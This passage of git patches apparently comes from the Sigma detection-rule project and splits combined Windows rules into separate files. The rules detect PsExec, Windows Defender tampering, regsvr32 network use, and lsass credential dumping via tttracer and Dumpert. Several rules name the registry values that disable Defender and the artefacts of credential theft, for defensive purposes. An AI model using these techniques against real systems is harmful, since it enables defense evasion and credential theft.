318f8b714e5cd01f63e1a5f3f49c37bc3741adbf Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:10:48 +0200 Subject: [PATCH 1004/1367] split global win_tool_psexec.yml --- .../file_event/file_event_tool_psexec.yml | 36 ++++++++++++++++ rules/windows/other/win_tool_psexec.yml | 42 +++---------------- .../pipe_created/pipe_created_tool_psexec.yml | 36 ++++++++++++++++ .../process_creation_tool_psexec.yml | 38 +++++++++++++++++ 4 files changed, 116 insertions(+), 36 deletions(-) create mode 100644 rules/windows/file_event/file_event_tool_psexec.yml create mode 100644 rules/windows/pipe_created/pipe_created_tool_psexec.yml create mode 100644 rules/windows/process_creation/process_creation_tool_psexec.yml diff --git a/rules/windows/file_event/file_event_tool_psexec.yml b/rules/windows/file_event/file_event_tool_psexec.yml new file mode 100644 index 00000000..91a51e0a --- /dev/null +++ b/rules/windows/file_event/file_event_tool_psexec.yml @@ -0,0 +1,36 @@ +title: PsExec Tool Execution +id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d +related: + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived +status: experimental +description: Detects PsExec service installation and execution events (service and Sysmon) +author: Thomas Patzke +date: 2017/06/12 +modified: 2021/09/21 +references: + - https://www.jpcert.or.jp/english/pub/sr/ir_research.html + - https://jpcertcc.github.io/ToolAnalysisResultSheet +tags: + - attack.execution + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0029 +fields: + - EventID + - CommandLine + - ParentCommandLine + - ServiceName + - ServiceFileName + - TargetFilename + - PipeName +logsource: + category: file_event + product: windows +detection: + sysmon_filecreation: + TargetFilename|endswith: '\PSEXESVC.exe' + condition: sysmon_filecreation +falsepositives: + - unknown +level: low \ No newline at end of file diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 60f46fc5..3528eaae 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -1,10 +1,10 @@ -action: global title: PsExec Tool Execution +id: 42c575ea-e41e-41f1-b248-8093c3e82a28 status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke date: 2017/06/12 -modified: 2021/08/26 +modified: 2021/09/21 references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet @@ -13,8 +13,6 @@ tags: - attack.t1035 # an old one - attack.t1569.002 - attack.s0029 -detection: - condition: 1 of them fields: - EventID - CommandLine @@ -23,11 +21,6 @@ fields: - ServiceFileName - TargetFilename - PipeName -falsepositives: - - unknown -level: low ---- -id: 42c575ea-e41e-41f1-b248-8093c3e82a28 logsource: product: windows service: system @@ -39,30 +32,7 @@ detection: service_execution: EventID: 7036 ServiceName: 'PSEXESVC' ---- -id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba -logsource: - category: process_creation - product: windows -detection: - sysmon_processcreation: - Image|endswith: '\PSEXESVC.exe' - User|startswith: - - 'NT AUTHORITY\SYSTEM' - - 'AUTORITE NT\Sys' # French language settings ---- -id: f3f3a972-f982-40ad-b63c-bca6afdfad7c -logsource: - category: pipe_created - product: windows -detection: - sysmon_pipecreated: - PipeName: '\PSEXESVC' ---- -id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d -logsource: - category: file_event - product: windows -detection: - sysmon_filecreation: - TargetFilename|endswith: '\PSEXESVC.exe' + condition: service_installation or service_execution +falsepositives: + - unknown +level: low \ No newline at end of file diff --git a/rules/windows/pipe_created/pipe_created_tool_psexec.yml b/rules/windows/pipe_created/pipe_created_tool_psexec.yml new file mode 100644 index 00000000..b662d0ef --- /dev/null +++ b/rules/windows/pipe_created/pipe_created_tool_psexec.yml @@ -0,0 +1,36 @@ +title: PsExec Tool Execution +id: f3f3a972-f982-40ad-b63c-bca6afdfad7c +related: + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived +status: experimental +description: Detects PsExec service installation and execution events (service and Sysmon) +author: Thomas Patzke +date: 2017/06/12 +modified: 2021/09/21 +references: + - https://www.jpcert.or.jp/english/pub/sr/ir_research.html + - https://jpcertcc.github.io/ToolAnalysisResultSheet +tags: + - attack.execution + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0029 +fields: + - EventID + - CommandLine + - ParentCommandLine + - ServiceName + - ServiceFileName + - TargetFilename + - PipeName +logsource: + category: pipe_created + product: windows +detection: + sysmon_pipecreated: + PipeName: '\PSEXESVC' + condition: sysmon_pipecreated +falsepositives: + - unknown +level: low \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_tool_psexec.yml b/rules/windows/process_creation/process_creation_tool_psexec.yml new file mode 100644 index 00000000..a352369a --- /dev/null +++ b/rules/windows/process_creation/process_creation_tool_psexec.yml @@ -0,0 +1,38 @@ +title: PsExec Tool Execution +id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba +related: + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived +status: experimental +description: Detects PsExec service installation and execution events (service and Sysmon) +author: Thomas Patzke +date: 2017/06/12 +modified: 2021/09/21 +references: + - https://www.jpcert.or.jp/english/pub/sr/ir_research.html + - https://jpcertcc.github.io/ToolAnalysisResultSheet +tags: + - attack.execution + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0029 + +fields: + - EventID + - CommandLine + - ParentCommandLine + - ServiceName + - ServiceFileName + - TargetFilename + - PipeName +logsource: + category: process_creation + product: windows +detection: + sysmon_processcreation: + Image|endswith: '\PSEXESVC.exe' + User|startswith: 'NT AUTHORITY\SYSTEM' + condition: sysmon_processcreation +falsepositives: + - unknown +level: low \ No newline at end of file From 2b23118b0d01f9de2a459290e897ea707a48f7db Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:16:25 +0200 Subject: [PATCH 1005/1367] split global win_defender_exclusions.yml --- .../windows/other/win_defender_exclusions.yml | 21 ++++---------- .../registry_event_defender_exclusions.yml | 28 +++++++++++++++++++ 2 files changed, 33 insertions(+), 16 deletions(-) create mode 100644 rules/windows/registry_event/registry_event_defender_exclusions.yml diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 5021ed75..3862ad15 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml @@ -1,7 +1,8 @@ -action: global title: Windows Defender Exclusions Added +id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f description: Detects the Setting of Windows Defender Exclusions date: 2021/07/06 +modified: 2021/09/21 author: Christian Burkard references: - https://twitter.com/_nullbind/status/1204923340810543109 @@ -10,11 +11,6 @@ tags: - attack.defense_evasion - attack.t1089 # an old one - attack.t1562.001 -falsepositives: - - Administrator actions -level: medium ---- -id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f logsource: product: windows service: windefend @@ -23,13 +19,6 @@ detection: EventID: 5007 New Value|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection1 ---- -id: a982fc9c-6333-4ffb-a51d-addb04e8b529 -logsource: - product: windows - category: registry_event -detection: - selection2: - EventID: 13 - TargetObject|contains: '\Microsoft\Windows Defender\Exclusions' - condition: selection2 +falsepositives: + - Administrator actions +level: medium \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_defender_exclusions.yml b/rules/windows/registry_event/registry_event_defender_exclusions.yml new file mode 100644 index 00000000..1840ff84 --- /dev/null +++ b/rules/windows/registry_event/registry_event_defender_exclusions.yml @@ -0,0 +1,28 @@ +title: Windows Defender Exclusions Added +id: a982fc9c-6333-4ffb-a51d-addb04e8b529 +related: + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: derived +description: Detects the Setting of Windows Defender Exclusions +date: 2021/07/06 +modified: 2021/09/21 +author: Christian Burkard +references: + - https://twitter.com/_nullbind/status/1204923340810543109 +status: test +tags: + - attack.defense_evasion + - attack.t1089 # an old one + - attack.t1562.001 +logsource: + product: windows + category: registry_event +detection: + selection2: + #EventID: 13 + EventType: SetValue + TargetObject|contains: '\Microsoft\Windows Defender\Exclusions' + condition: selection2 +falsepositives: + - Administrator actions +level: medium \ No newline at end of file From c0e24e9236127586412b9e85fe5358484cca0302 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:24:52 +0200 Subject: [PATCH 1006/1367] split global win_defender_disabled.yml --- rules/windows/other/win_defender_disabled.yml | 43 +++---------------- .../other/win_system_defender_disabled.yml | 30 +++++++++++++ .../registry_event_defender_disabled.yml | 35 +++++++++++++++ 3 files changed, 71 insertions(+), 37 deletions(-) create mode 100644 rules/windows/other/win_system_defender_disabled.yml create mode 100644 rules/windows/registry_event/registry_event_defender_disabled.yml diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml index 4c7ec817..14063f75 100644 --- a/rules/windows/other/win_defender_disabled.yml +++ b/rules/windows/other/win_defender_disabled.yml @@ -1,8 +1,8 @@ -action: global title: Windows Defender Threat Detection Disabled +id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 description: Detects disabling Windows Defender threat protection date: 2020/07/28 -modified: 2021/07/05 +modified: 2021/09/21 author: Ján Trenčanský, frack113 references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus @@ -12,11 +12,6 @@ tags: - attack.defense_evasion - attack.t1089 # an old one - attack.t1562.001 -falsepositives: - - Administrator actions -level: high ---- -id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 logsource: product: windows service: windefend @@ -27,33 +22,7 @@ detection: - 5010 - 5012 - 5101 - selection2: - TargetObject: - - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend - - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender - - HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender - Details: 'DWORD (0x00000001)' - condition: 1 of them ---- -id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 -logsource: - product: windows - category: registry_event -detection: - tamper_registry: - EventType: 'SetValue' - TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' - Details: 'DWORD (0x00000001)' - condition: tamper_registry ---- -id: 6c0a7755-6d31-44fa-80e1-133e57752680 -logsource: - product: windows - category: system -detection: - selection3: - EventID: 7036 - keywords: - - 'Windows Defender Antivirus Service' - - 'stopped' - condition: selection3 and all of keywords \ No newline at end of file + condition: selection +falsepositives: + - Administrator actions +level: high \ No newline at end of file diff --git a/rules/windows/other/win_system_defender_disabled.yml b/rules/windows/other/win_system_defender_disabled.yml new file mode 100644 index 00000000..15114f1d --- /dev/null +++ b/rules/windows/other/win_system_defender_disabled.yml @@ -0,0 +1,30 @@ +title: Windows Defender Threat Detection Disabled +id: 6c0a7755-6d31-44fa-80e1-133e57752680 +related: + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: derived +description: Detects disabling Windows Defender threat protection +date: 2020/07/28 +modified: 2021/09/21 +author: Ján Trenčanský, frack113 +references: + - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md +status: stable +tags: + - attack.defense_evasion + - attack.t1089 # an old one + - attack.t1562.001 +logsource: + product: windows + category: system +detection: + selection3: + EventID: 7036 + keywords: + - 'Windows Defender Antivirus Service' + - 'stopped' + condition: selection3 and all of keywords +falsepositives: + - Administrator actions +level: high \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_defender_disabled.yml b/rules/windows/registry_event/registry_event_defender_disabled.yml new file mode 100644 index 00000000..bdff48ba --- /dev/null +++ b/rules/windows/registry_event/registry_event_defender_disabled.yml @@ -0,0 +1,35 @@ +title: Windows Defender Threat Detection Disabled +id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 +related: + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: derived +description: Detects disabling Windows Defender threat protection +date: 2020/07/28 +modified: 2021/09/21 +author: Ján Trenčanský, frack113 +references: + - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md +status: test +tags: + - attack.defense_evasion + - attack.t1089 # an old one + - attack.t1562.001 +logsource: + product: windows + category: registry_event +detection: + tamper_registry: + EventType: SetValue + TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' + Details: 'DWORD (0x00000001)' + selection2: + TargetObject: + - 'HKLM\SYSTEM\CurrentControlSet\Services\WinDefend' + - 'HKLM\SOFTWARE\Microsoft\Windows Defender' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' + Details: 'DWORD (0x00000001)' + condition: tamper_registry or selection2 +falsepositives: + - Administrator actions +level: high \ No newline at end of file From 4c85858e1229eb08bd4008ffb5827cb97c280477 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:33:47 +0200 Subject: [PATCH 1007/1367] split global sysmon_regsvr32_network_activity.yml --- .../dns_query_regsvr32_network_activity.yml | 37 +++++++++++++++++++ .../sysmon_regsvr32_network_activity.yml | 19 +++------- 2 files changed, 43 insertions(+), 13 deletions(-) create mode 100644 rules/windows/dns_query/dns_query_regsvr32_network_activity.yml diff --git a/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml b/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml new file mode 100644 index 00000000..a0299149 --- /dev/null +++ b/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml @@ -0,0 +1,37 @@ +title: Regsvr32 Network Activity +id: 36e037c4-c228-4866-b6a3-48eb292b9955 +related: + - id: c7e91a02-d771-4a6d-a700-42587e0b1095 + type: derived +description: Detects network connections and DNS queries initiated by Regsvr32.exe +references: + - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md +tags: + - attack.execution + - attack.t1559.001 + - attack.t1175 # an old one + - attack.defense_evasion + - attack.t1218.010 + - attack.t1117 # an old one +author: Dmitriy Lifanov, oscd.community +status: experimental +date: 2019/10/25 +modified: 2021/09/21 +logsource: + category: dns_query + product: windows +detection: + selection: + Image|endswith: '\regsvr32.exe' + condition: selection +fields: + - ComputerName + - User + - Image + - DestinationIp + - DestinationPort +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index fd57839c..ade7b307 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -1,5 +1,5 @@ -action: global title: Regsvr32 Network Activity +id: c7e91a02-d771-4a6d-a700-42587e0b1095 description: Detects network connections and DNS queries initiated by Regsvr32.exe references: - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ @@ -15,7 +15,10 @@ tags: author: Dmitriy Lifanov, oscd.community status: experimental date: 2019/10/25 -modified: 2020/08/24 +modified: 2021/09/21 +logsource: + category: network_connection + product: windows detection: selection: Image|endswith: '\regsvr32.exe' @@ -28,14 +31,4 @@ fields: - DestinationPort falsepositives: - unknown -level: high ---- -id: c7e91a02-d771-4a6d-a700-42587e0b1095 -logsource: - category: network_connection - product: windows ---- -id: 36e037c4-c228-4866-b6a3-48eb292b9955 -logsource: - category: dns_query - product: windows +level: high \ No newline at end of file From 5fc82e5dc6938f83781a50fda285edd0f264c611 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:39:02 +0200 Subject: [PATCH 1008/1367] split global sysmon_tttracer_mod_load.yml --- .../process_creation_tttracer_mod_load.yml | 29 +++++++++++++++++++ .../image_load/sysmon_tttracer_mod_load.yml | 26 +++++------------ 2 files changed, 37 insertions(+), 18 deletions(-) create mode 100644 rules/windows/image_load/process_creation_tttracer_mod_load.yml diff --git a/rules/windows/image_load/process_creation_tttracer_mod_load.yml b/rules/windows/image_load/process_creation_tttracer_mod_load.yml new file mode 100644 index 00000000..ffccba04 --- /dev/null +++ b/rules/windows/image_load/process_creation_tttracer_mod_load.yml @@ -0,0 +1,29 @@ +title: Time Travel Debugging Utility Usage +id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a +status: experimental +related: + - id: e76c8240-d68f-4773-8880-5c6f63595aaf + type: derived +description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ + - https://twitter.com/mattifestation/status/1196390321783025666 + - https://twitter.com/oulusoyum/status/1191329746069655553 +author: 'Ensar Şamil, @sblmsrsn, @oscd_initiative' +date: 2020/10/06 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.credential_access + - attack.t1218 + - attack.t1003.001 +logsource: + product: windows + category: process_creation +detection: + selection: + ParentImage|endswith: '\tttracer.exe' + condition: selection +falsepositives: + - Legitimate usage by software developers/testers +level: high \ No newline at end of file diff --git a/rules/windows/image_load/sysmon_tttracer_mod_load.yml b/rules/windows/image_load/sysmon_tttracer_mod_load.yml index 955ca591..c4011748 100644 --- a/rules/windows/image_load/sysmon_tttracer_mod_load.yml +++ b/rules/windows/image_load/sysmon_tttracer_mod_load.yml @@ -1,5 +1,6 @@ -action: global title: Time Travel Debugging Utility Usage +id: e76c8240-d68f-4773-8880-5c6f63595aaf +status: experimental description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ @@ -7,33 +8,22 @@ references: - https://twitter.com/oulusoyum/status/1191329746069655553 author: 'Ensar Şamil, @sblmsrsn, @oscd_initiative' date: 2020/10/06 +modified: 2021/09/21 tags: - attack.defense_evasion - attack.credential_access - attack.t1218 - attack.t1003.001 -detection: - condition: 1 of them -falsepositives: - - Legitimate usage by software developers/testers -level: high ---- -id: e76c8240-d68f-4773-8880-5c6f63595aaf logsource: product: windows category: image_load detection: - selection1: + selection: ImageLoaded|endswith: - '\ttdrecord.dll' - '\ttdwriter.dll' - '\ttdloader.dll' ---- -id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a -logsource: - product: windows - category: process_creation -detection: - selection2: - ParentImage|endswith: - - '\tttracer.exe' + condition: selection +falsepositives: + - Legitimate usage by software developers/testers +level: high \ No newline at end of file From 4718f914e9005f157ba702ef3042b097f5c969c8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:43:42 +0200 Subject: [PATCH 1009/1367] split global sysmon_hack_dumpert.yml --- .../file_event/file_event_hack_dumpert.yml | 27 +++++++++++++++++++ .../process_creation_hack_dumpert.yml} | 22 +++++---------- 2 files changed, 33 insertions(+), 16 deletions(-) create mode 100755 rules/windows/file_event/file_event_hack_dumpert.yml rename rules/windows/{file_event/sysmon_hack_dumpert.yml => process_creation/process_creation_hack_dumpert.yml} (71%) mode change 100755 => 100644 diff --git a/rules/windows/file_event/file_event_hack_dumpert.yml b/rules/windows/file_event/file_event_hack_dumpert.yml new file mode 100755 index 00000000..ed3625db --- /dev/null +++ b/rules/windows/file_event/file_event_hack_dumpert.yml @@ -0,0 +1,27 @@ +title: Dumpert Process Dumper +id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 +related: + - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 + type: derived +status: experimental +description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory +author: Florian Roth +references: + - https://github.com/outflanknl/Dumpert + - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ +date: 2020/02/04 +modified: 2021/09/21 +tags: + - attack.credential_access + - attack.t1003 # an old one + - attack.t1003.001 +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename: C:\Windows\Temp\dumpert.dmp + condition: selection +falsepositives: + - Very unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/file_event/sysmon_hack_dumpert.yml b/rules/windows/process_creation/process_creation_hack_dumpert.yml old mode 100755 new mode 100644 similarity index 71% rename from rules/windows/file_event/sysmon_hack_dumpert.yml rename to rules/windows/process_creation/process_creation_hack_dumpert.yml index 8259b12c..962e0bf4 --- a/rules/windows/file_event/sysmon_hack_dumpert.yml +++ b/rules/windows/process_creation/process_creation_hack_dumpert.yml @@ -1,21 +1,17 @@ -action: global title: Dumpert Process Dumper +id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 +status: experimental description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory author: Florian Roth references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ date: 2020/02/04 -modified: 2020/08/23 +modified: 2021/09/21 tags: - attack.credential_access - attack.t1003 # an old one - attack.t1003.001 -falsepositives: - - Very unlikely -level: critical ---- -id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 logsource: category: process_creation product: windows @@ -23,12 +19,6 @@ detection: selection: Imphash: '09D278F9DE118EF09163C6140255C690' condition: selection ---- -id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 -logsource: - category: file_event - product: windows -detection: - selection: - TargetFilename: C:\Windows\Temp\dumpert.dmp - condition: selection +falsepositives: + - Very unlikely +level: critical \ No newline at end of file From 0884a70e28c4851f7fa8f5846899b8d29c4c818f Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:52:37 +0200 Subject: [PATCH 1010/1367] fix tests.py error --- .../network_connection/sysmon_regsvr32_network_activity.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index ade7b307..4fed79c6 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -21,6 +21,7 @@ logsource: product: windows detection: selection: + EventID: 3 # need to pass the test "There are rule files with exactly the same detection logic" Image|endswith: '\regsvr32.exe' condition: selection fields: From 06ed7c41af223c9144c38b5e94f36cfc6fb4d4e6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:15:21 +0200 Subject: [PATCH 1011/1367] split clobal win_tap_driver_installation.yml --- .../driver_load_tap_driver_installation.yml | 23 ++++++++++++++ .../win_security_tap_driver_installation.yml | 24 +++++++++++++++ .../builtin/win_tap_driver_installation.yml | 30 +++++-------------- 3 files changed, 54 insertions(+), 23 deletions(-) create mode 100644 rules-unsupported/driver_load_tap_driver_installation.yml create mode 100644 rules/windows/builtin/win_security_tap_driver_installation.yml diff --git a/rules-unsupported/driver_load_tap_driver_installation.yml b/rules-unsupported/driver_load_tap_driver_installation.yml new file mode 100644 index 00000000..8e9b1be1 --- /dev/null +++ b/rules-unsupported/driver_load_tap_driver_installation.yml @@ -0,0 +1,23 @@ +title: Tap Driver Installation +id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb +related: + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques +status: experimental +author: Daniil Yugoslavskiy, Ian Davis, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|contains: 'tap0901' + condition: selection +falsepositives: + - Legitimate OpenVPN TAP insntallation +level: medium diff --git a/rules/windows/builtin/win_security_tap_driver_installation.yml b/rules/windows/builtin/win_security_tap_driver_installation.yml new file mode 100644 index 00000000..93f21154 --- /dev/null +++ b/rules/windows/builtin/win_security_tap_driver_installation.yml @@ -0,0 +1,24 @@ +title: Tap Driver Installation +id: 9c8afa4d-0022-48f0-9456-3712466f9701 +related: + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques +status: experimental +author: Daniil Yugoslavskiy, Ian Davis, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + ServiceFileName|contains: 'tap0901' + condition: selection +falsepositives: + - Legitimate OpenVPN TAP insntallation +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_tap_driver_installation.yml b/rules/windows/builtin/win_tap_driver_installation.yml index cc3ce6e7..a7e1f470 100644 --- a/rules/windows/builtin/win_tap_driver_installation.yml +++ b/rules/windows/builtin/win_tap_driver_installation.yml @@ -1,37 +1,21 @@ -action: global title: Tap Driver Installation +id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques status: experimental author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 +modified: 2021/09/21 tags: - attack.exfiltration - attack.t1048 -falsepositives: - - Legitimate OpenVPN TAP insntallation -level: medium -detection: - selection: - ImagePath|contains: 'tap0901' - condition: selection ---- -id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 logsource: product: windows service: system detection: selection: EventID: 7045 ---- -id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb -logsource: - product: windows - category: driver_load ---- -id: 9c8afa4d-0022-48f0-9456-3712466f9701 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 + ImagePath|contains: 'tap0901' + condition: selection +falsepositives: + - Legitimate OpenVPN TAP insntallation +level: medium \ No newline at end of file From 99f24a95a68e464c8e7337b43192c0b25550ea32 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:19:00 +0200 Subject: [PATCH 1012/1367] split global win_susp_failed_logons_single_source.yml --- .../win_susp_failed_logons_single_source.yml | 27 +++++------------ .../win_susp_failed_logons_single_source2.yml | 29 +++++++++++++++++++ 2 files changed, 37 insertions(+), 19 deletions(-) create mode 100644 rules/windows/builtin/win_susp_failed_logons_single_source2.yml diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source.yml b/rules/windows/builtin/win_susp_failed_logons_single_source.yml index b4ad3b78..e3e971c5 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source.yml @@ -1,9 +1,9 @@ -action: global title: Failed Logins with Different Accounts from Single Source System +id: e98374a6-e2d9-4076-9b5c-11bdb2569995 description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth date: 2017/01/10 -modified: 2021/08/29 +modified: 2021/09/21 tags: - attack.persistence - attack.privilege_escalation @@ -11,14 +11,6 @@ tags: logsource: product: windows service: security -falsepositives: - - Terminal servers - - Jump servers - - Other multiuser systems like Citrix server farms - - Workstations with frequently changing users -level: medium ---- -id: e98374a6-e2d9-4076-9b5c-11bdb2569995 detection: selection1: EventID: @@ -27,12 +19,9 @@ detection: TargetUserName: '*' WorkstationName: '*' condition: selection1 | count(TargetUserName) by WorkstationName > 3 ---- -id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 -detection: - selection2: - EventID: 4776 - TargetUserName: '*' - Workstation: '*' - timeframe: 24h - condition: selection2 | count(TargetUserName) by Workstation > 3 +falsepositives: + - Terminal servers + - Jump servers + - Other multiuser systems like Citrix server farms + - Workstations with frequently changing users +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source2.yml b/rules/windows/builtin/win_susp_failed_logons_single_source2.yml new file mode 100644 index 00000000..9a85a45b --- /dev/null +++ b/rules/windows/builtin/win_susp_failed_logons_single_source2.yml @@ -0,0 +1,29 @@ +title: Failed Logins with Different Accounts from Single Source System +id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 +related: + - id: e98374a6-e2d9-4076-9b5c-11bdb2569995 + type: derived +description: Detects suspicious failed logins with different user accounts from a single source system +author: Florian Roth +date: 2017/01/10 +modified: 2021/09/21 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1078 +logsource: + product: windows + service: security +detection: + selection2: + EventID: 4776 + TargetUserName: '*' + Workstation: '*' + timeframe: 24h + condition: selection2 | count(TargetUserName) by Workstation > 3 +falsepositives: + - Terminal servers + - Jump servers + - Other multiuser systems like Citrix server farms + - Workstations with frequently changing users +level: medium \ No newline at end of file From 332bed79062fbc4540a576dc4eac1d30051d2746 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:22:40 +0200 Subject: [PATCH 1013/1367] split global win_susp_eventlog_cleared.yml --- .../builtin/win_susp_eventlog_cleared.yml | 25 ++++----------- .../win_system_susp_eventlog_cleared.yml | 32 +++++++++++++++++++ 2 files changed, 38 insertions(+), 19 deletions(-) create mode 100644 rules/windows/builtin/win_system_susp_eventlog_cleared.yml diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index ecd5b252..454919e5 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -1,5 +1,5 @@ -action: global title: Eventlog Cleared +id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - id: f2f01843-e7b8-4f95-a35a-d23584476423 type: obsoletes @@ -9,18 +9,12 @@ references: - 